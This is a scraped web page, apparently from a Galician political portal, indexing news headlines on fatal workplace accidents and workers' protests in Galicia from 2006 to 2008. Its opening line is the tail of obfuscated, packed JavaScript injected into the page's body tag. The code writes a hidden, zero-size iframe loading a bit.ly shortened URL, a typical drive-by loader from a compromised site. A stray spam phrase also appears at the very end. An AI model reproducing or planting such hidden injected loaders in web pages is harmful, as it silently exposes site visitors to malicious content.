\');',15,15,'|iframe|document|write|src|http|bit|ly|2b4mWbk|border|width|height|style|visibility|hidden'.split('|'),0,{}))" bgcolor="#FFFFFF" text="#000000">

 

O nosso portal vem fazendo, especialmente nos três últimos anos, acompanhamento informativo e de denúncia do que é um dos mais graves problemas socioeconómicos da Galiza: a realidade dos contínuos acidentes de diversa consideraçom, incluídos os mortais, que situam a classe trabalhadora galega à frente das estatísticas europeias.

Esta crua imagem da realidade laboral galega, tam ligada à precaridade e falta de direitos no mercado do trabalho, tem a virtualidade de mostrar com toda a sua crueldade a realidade da exploraçom, as responsabilidades patronais e a impunidade de que os patrons gozam graças à condescendência das centrais sindicais pró-sistema e à cumplicidade das instituiçons da pseudo-democracia espanhola, que neste aspecto se mostra como o que realmente é: um sistema ao serviço da classe dominante e os seus interesses, contrários por definiçom aos da maioria social.

Nestas páginas poderás ver, agrupadas mês a mês, as notícias, comunicados, acçons de luita e outras informaçons relacionadas com os acidentes laborais e a luita operária para os erradicar do nosso país. A grande dimensom deste problema quotidiano e as limitaçons do nosso portal impedem-nos um acompanhamento tam exaustivo como quereríamos, mas nom deixaremos de situar no primeiro plano a denúncia e a acçom contra a forma mais descarnada de extorsom patronal de que a nossa classe é vítima.

 

Novembro de 2008

Acidente laboral mortal em Lalim. (+...)

Morre instalador de lousados no Berzo, ao cair de umha altura de 11 metros. (+...)

Dous operários mortos em acidente laboral em Ourense e a Caniça. (+...)

 

Outubro de 2008

Quinto acidente laboral mortal no Berzo neste ano. (+...)

 

Agosto de 2008

NÓS-Unidade Popular critica falta de vontade política para combater acidentalidade laboral. (+...)

Acidentes laborais em alta. (+...)

'Campanha de Verao' na Galiza: duas novas vítimas mortais do terrorismo patronal. (+...)

 

Julho de 2008

Mais um 'acidente' laboral mortal, agora no Berzo. (+...)

Junho de 2008

Junta oferece mao de obra jovem, barata, trabalhadora e mansinha. (+...)

Ministros do Trabalho da UE aprovam o maior retrocesso em direitos laborais das últimas décadas. (+...)

 

Maio de 2008

Mais um obreiro morto em acidente de trabalho, agora em Mós. (+...)

Trabalhadores mortos em Ponte Vedra, Vila Garcia e no mar. (+...)

Milhares de trabalhadores e trabalhadoras galegas manifestam-se no Dia do Internacionalismo Proletário. (+...)

 

Abril de 2008

Acidentes laborais: um trabalhador morto no Carvalhinho e um ferido em Noia. (+...)

Mais acidentes laborais graves e mortais em diferentes pontos da Galiza. (+...)

 

Março de 2008

Primeiros meses de 2008 marcam tendência em alta dos acidentes laborais na Galiza. (+...)

Mais mortes e feridos em acidentes laborais. (+...)

Sucedem-se acidentes laborais com resultado de morte. (+...)

 

Janeiro de 2008

Sucedem-se acidentes laborais de gravidade em diferentes pontos da Galiza. (+...)

Nove em cada dez contratos assinados na Galiza em 2007 fôrom a prazo. (+...)

 

Novembro de 2007

Mais um morto (e vam quatro) nas obras do porto exterior da Corunha. (+...)

Delinqüência patronal continua a fazer vítimas. (+...)

 

Setembro de 2007

Mais acidentes laborais, na terra e no mar, e ninguém responde. (+...)

Dados oficiais certificam aumento da sinistralidade laboral na Galiza em 2007. (+...)

 

Agosto de 2007

Outro jovem trabalhador morre em acidente laboral. (+...)

Milhares de trabalhadores e trabalhadoras tomam Vigo para exigir medidas contra a sinistralidade laboral. (+...)

 

Junho de 2007

Outro operário morto, agora em Ponte Areas. (+...)

 

Abril de 2007

Obreiro do sector naval morre num estaleiro de Catoira. (+...)

 

Fevereiro de 2007

Mais umha vítima mortal por sinistro laboral na construçom. (+...) Mais mortes e feridos em sinistros laborais. (+...)

Juventude trabalhadora galega, líder em acidentes laborais e doenças profissionais. (+...)

Sucedem-se novos acidentes laborais de gravidade. (+...)

 

Janeiro de 2007

Acidentes laborais aumentárom em 2006 na Comunidade Autónoma da Galiza. (+...)

Ferroatlántica, longa tradiçom contra a segurança dos trabalhadores e trabalhadoras. (+...)

 

Dezembro de 2006

Acidente na construçom soma mais um trabalhador morto na Marinha. (+...)

 

Novembro de 2006

Jovem trabalhador morre numhas obras do porto de Marim. (+...)

Morrem dous pescadores galegos nas águas da Namíbia. (+...)

Três novas mortes em acidente laboral em menos de umha semana. (+...)

 

Outubro de 2006

Sinistralidade laboral aumenta no sector do transporte. (+...)

Setembro de 2006

Ferido grave jovem trabalhador da construçom no Salnês. (+...)

Novo acidente laboral mortal no Berzo. (+...)

Outro trabalhador morto no sector da lousa, agora em Quiroga. (+...)

 

Agosto de 2006

A falta de medidas de segurança causou a morte do obreiro em Valdeorras. (+...)

Morre um trabalhador na canteira de Carvalheda de Valdeorras. (+...)

 

Julho de 2006

Operário da construçom morre em acidente laboral. (+...)

 

Junho de 2006

Jovem soldador ferido grave em Lugo no trabalho. (+...)

Jornada de greve contra os acidentes laborais em Vigo. (+...)

Morre um trabalhador em acidente laboral em Sober. (+...)

 

Maio de 2006

Novos acidentes mortais na construçom. (+...)

Três trabalhadores mortos num grave acidente laboral no mar. (+...)

 

Abril de 2006

CIG denuncia empresa responsável polo acidente laboral de Ribeira (+...)

Obreiro da construçom morre numha obra de Ribeira (+...)

Porrinho: acidentes laborais continuam (+...)

 

Março de 2006

Presidente patronal responsabiliza directamente as vítimas polos acidentes laborais (+...)

Líder patronal gosta da proposta estatutária do BNG (+...)

Esquerda independentista participa nos actos de hoje em defesa da Classe Obreira Galega (+...)

NÓS-UP chama a participar nos actos da CIG no Dia da Classe Obreira Galega (+...)

Obreiro de umha empresa auxiliar de Meirama morre no posto de trabalho (+...)

 

Fevereiro de 2006

Corrupçom a esgalha: a Junta do PP e os "negócios" do chefe dos patrons (+...)

Máfia e democracia neoliberal (+...)

NÓS-UP reclama medidas concretas e urgentes para reduzir a sinistralidade laboral (+...)

Centenas de pessoas manifestam-se após a morte de um jovem operário num estaleiro de Marim (+...)

Pressons operárias obrigam a paralisar obras do porto exterior corunhês (+...)

Outros dous trabalhadores mortos e o anunciado "plano de choque" contra os sinistros laborais continua sem ser apresentado (+...)

Sinistralidade laboral voltou a aumentar na Galiza em 2005 (+...)

Acidente laboral mortal na Pastoriça (+...)

Janeiro de 2006

Grave acidente laboral em pleno centro de Vigo (+...)

Primeiro operário morto no trabalho em 2006 (+...)

Anos anteriores

(2005) ->

(2004) ->

 

Voltar à página principal

 

orthopedic pain management